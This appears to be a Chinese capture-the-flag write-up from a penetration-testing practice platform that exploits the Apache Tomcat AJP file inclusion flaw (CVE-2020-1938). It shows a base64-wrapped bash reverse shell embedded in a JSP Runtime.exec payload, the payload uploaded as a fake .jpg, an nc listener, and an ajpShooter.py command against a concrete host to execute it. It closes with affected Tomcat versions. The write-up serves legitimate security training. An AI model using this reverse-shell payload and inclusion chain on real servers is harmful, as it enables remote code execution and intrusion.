安鸾渗透实战平台（中间件） Apache Tomcat AJP 文件包含漏洞（CVE-2020-1938 ） (150分)

漏洞环境

安鸾渗透实战平台
公网vps
CVE-2020-1938文件包含exp
base64加密网站

题目：

解法:

1、访问对应网页

网页上可以发现一个明显的上传点，而题目是文件包含漏洞，所以可以编写一个代码代码文件上传，然后使用文件包含就行。由于文件包含不限制后缀，这里直接上传.jsp后缀即可

2、制作一个反弹shell文件

写一个反弹shell然后拿去base64加密

bash -i >& /dev/tcp/1.1.1.1/666  0>&1

将加密后的内容做拼接，方便java解析

<%Runtime.getRuntime().exec("bash -c {echo,bash64加密后的内容}|{base64,-d}|{bash,-i}");%>

保存为jpg

3、来到上传点进行上传

上传后系统会把你的文件重命名，为了防止搞混，可以先点击查看所有图片去蹲点

文件上传成功，点击查看图片

找到你上传的图片
鼠标右键点击复制图片连接

5、起一台公网vps使用nc监听反弹shell的端口

nc -lnp 666

6、使用脚本进行文件包含

python ajpShooter.py http://106.15.50.112:18080/whalwl 18009 /upload/2023-000002-000008.jpg eval

• http://106.15.50.112:18080/whalwl：页面位置
• 18009 ：ajp端口号
• /upload/2023-000002-000008.jpg ：上传反弹shell图片的位置
• eval ：执行

当回显200状态码时，证明成功包含并执行文件

7、来到vps上检查效果

使用 find / -name flag 来查找flag

可以看到在根目录上，直接看

cat /flag

漏洞描述

  该漏洞使攻击者可以读取任何webapps文件（例如webapp配置文件，源代码等）或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务（8009端口）存在一处文件包含缺陷，攻击者可构造恶意的请求包进行文件包含操作，进而读取受影响Tomcat服务器上的Web目录文件。

影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31